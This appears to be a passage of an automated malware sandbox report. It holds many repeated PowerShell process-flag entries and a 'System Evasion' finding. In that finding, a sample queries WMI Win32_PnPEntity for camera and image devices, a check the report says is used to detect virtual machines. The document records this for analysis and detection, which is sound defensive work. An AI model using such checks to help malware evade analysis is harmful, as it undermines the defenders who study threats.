Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
